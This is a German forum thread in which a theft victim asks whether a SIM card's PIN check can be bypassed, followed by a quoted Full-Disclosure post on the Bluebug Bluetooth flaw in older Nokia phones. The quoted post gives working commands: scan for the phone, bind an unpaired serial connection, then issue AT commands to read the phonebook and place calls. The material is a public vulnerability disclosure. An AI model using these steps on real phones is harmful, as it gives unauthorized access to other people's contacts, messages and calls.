pinumgehung bei handy doch möglich ?

hallo ....ich hab ein problem und nachdem ich bei meinen recherchen auf das board kam, wollt ich mich mal erkundigen. mir ist vor weihnachten mein nokia 3510 i abhanden gekommen, was aber AUS geschaltet war. erst dachte ich , ich habs verlegt und nicht intensiv gesucht. dann hab ichs sperren lassen und eine neue karte bekommen. bei der rechnung traf mich der schlag, hatte doch einer fröhlich 2 tage nach bulgarien telefoniert für schlappe 500 euro bis vodaphone das selber gesperrt hat, weils ihnen wohl komisch vorkam. ich hatte mich aber in sicherheit gewogen , weil behauptet wird von vodaphone ,man könne die pin abfrage nicht umgehn. die kripo meinte , es lägen bei ihnen vage erkenntnisse vor, dass es da wohl schon dinge gäbe, die simcards- ähnlich der scheckkarte - auf blancocards zu kopieren und dann mit neuer pin zu versehen und zu telefonieren.sei im ostblock sehr beliebt und würde zu uns schwappen.. nur könnten sie mir nicht wirklich was dazu sagen , sie seien technisch noch nicht soweit !!!!!!
ich muss also um bei vodaphone meine haftungsgrenze anerkannt zu kriegen irgendwie rauskriegen ob das machbar ist theoretisch und wie....ich find nur leider nichts dazu im netz ...könnt ihr mir da ein paar tips geben wo ich anfragen kann und soll ? das lka bayern ist jedenfalls noch nicht soweit, dass sie kapieren wie das gemacht wird.
vielen dank :-)
schnakes
 
hallo :-)) danke für den link des progis, ich weiss zwar nicht ob die das als beweis akzeptieren,aber vielleicht finde ich noch irgendwo berichte, dass das knacken einer d2 simcard älteren baujahrs ( meine stammte von 2000/01 aus meinem alten 3310) bereits gelungen ist. vodaphone streitet die möglichkeit ja kategorisch ab und es geistern ja durchaus gerüchte herum, dass das anderen wohl testweise schon gelungen sei.
gruss schnakes
 
Da sind sie :-)

Adam Laurie napisaB(a):
> Details of the attacks were disclosed at the Chaos Computer Club's annual > congress in Berlin - 21C3:

According to the [1], not all details were disclosed. Actually, there is no
reason for keeping them secret here, while they are well known and actively
exploited in the blackhat community.

The Bluebug, as described on [1] is trivially exploitable on some non-Symbian
Nokia phones. It allows attacker to create serial profile connection without
pairing or asking for permission, therefore it gives unauthorized access to all
AT commands. It is possible to read/delete/send SMS messages, add/view/delete
phonebook entries, change call diverts, initiate voice or data call.

Demonstration on Nokia 6310i:

laptop:~# hcitool scan
Scanning ...
00:60:57:38:8C:D8 Nokia 6310i
laptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C:D8 17

Now you can use plain AT commands, as described in manual [2] or Gnokii [3], for
example:

laptop:~# cu -l rfcomm0 -s 9600
Connected.
[ATE1]
OK
ATI
Nokia

OK
AT+CPBS?
+CPBS: "SM",0,100

OK
AT+CPBR=?
+CPBR: (1-100),48,18

OK
ATDT+48609xxxxxx
OK


As you can see, the bug is really trivial and looks rather like backdoor.


[1] - http://www.thebunker.net/security/bluetooth.htm
[2] - http://ncsp.forum.nokia.com/download/?asset_id=11579;ref=devx
[3] - http://www.gnokii.org/

Quelle: Full-Disclosure
 
Zurück
Oben